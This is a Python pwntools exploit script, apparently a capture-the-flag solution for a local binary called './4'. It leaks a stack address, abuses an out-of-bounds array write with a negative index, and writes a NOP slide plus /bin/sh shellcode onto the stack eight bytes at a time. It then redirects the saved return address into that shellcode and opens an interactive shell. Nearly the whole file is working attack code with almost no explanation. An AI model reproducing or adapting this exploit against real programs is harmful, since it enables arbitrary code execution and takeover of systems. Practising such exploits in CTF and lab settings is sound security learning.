#!/usr/bin/env python3# -*- coding: utf-8 -*-# This exploit template was gen

1. #!/usr/bin/env python3
2. # -*- coding: utf-8 -*-
3. # This exploit template was generated via:
4. # $ pwn template
5. from pwn import *
6. from ctypes import *
7. # Set up pwntools for the correct architecture
8. context.update(arch='amd64')
9.  
10. exe = context.binary ='./4'
11.  
12. # Many built-in settings can be controlled on the command-line and show up
13. # in "args".  For example, to dump all data sent/received, and disable ASLR
14. # for all created processes...
15. # ./exploit.py DEBUG NOASLR
16.  
17.  
18. def start(argv=[], *a, **kw):
19.     '''Start the exploit against the target.'''
20.     if args.GDB:
21.         return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
22.     else:
23.         return process([exe] + argv, *a, **kw)
24.  
25. # Specify your GDB script here for debugging
26. # GDB will be launched if the exploit is run via e.g.
27. # ./exploit.py GDB
28. gdbscript = '''
29. continue
30. '''.format(**locals())
31.  
32. #===========================================================
33. #                    EXPLOIT GOES HERE
34. #===========================================================
35.  
36. io = start()
37.  
38. nopslide=asm(
39.     "nop\n"*304
40. )
41. shellcode = asm(shellcraft.amd64.sh())
42.  
43.  
44.  
45. #get stack addr
46. io.recvuntil("Exit\n")
47. io.send(b"2\n")
48. io.recvuntil(b"read?")
49. io.send(b"15\n")
50. io.recvuntil("for: ")
51. dataleak=int(io.recvuntil(b"1)").split(b"1)")[0])
52.  
53.  
54. p=nopslide+shellcode
55.  
56. print("dataleak: 0x%x"%dataleak)
57.  
58. io.recvuntil(b"Exit\n")
59. io.send(b"1\n")
60. io.recvuntil("number\n")
61. io.send(b"-1\n")
62. io.recvuntil("number!\n")
63. io.send(b"99999999999999999\n")
64.  
65.  
66. for i in range(len(p)//8):
67.     io.recvuntil("Exit\n")
68.     io.sendline("1")
69.     io.recv()
70.     io.sendline(str(16+i))
71.    
72.     shellcode_part = p[0+8*i:i*8+8]
73.     shellcode_int = int.from_bytes(shellcode_part, byteorder='little')
74.  
75.     print(shellcode_part)
76.     print(str(shellcode_int))
77.    
78.     if(shellcode_int > 0x7fffffffffffffff):
79.         shellcode_int = (c_long(shellcode_int)).value
80.  
81.     io.sendline(str(shellcode_int))
82.  
83.  
84. #modify to enter the nopslide
85. dataleak-=120
86.  
87. io.recvuntil("Exit")
88. io.sendline("1")
89. io.recv()
90. io.sendline(str("66")) #rbp + 1
91. io.sendline(str(dataleak))
92. io.recv()
93. io.send("0\n")
94. #print("0x%x"%addr)
95. #io.send(padding+addr)
96. #io.send(nopslide+shellcode+b"\n")
97. io.interactive()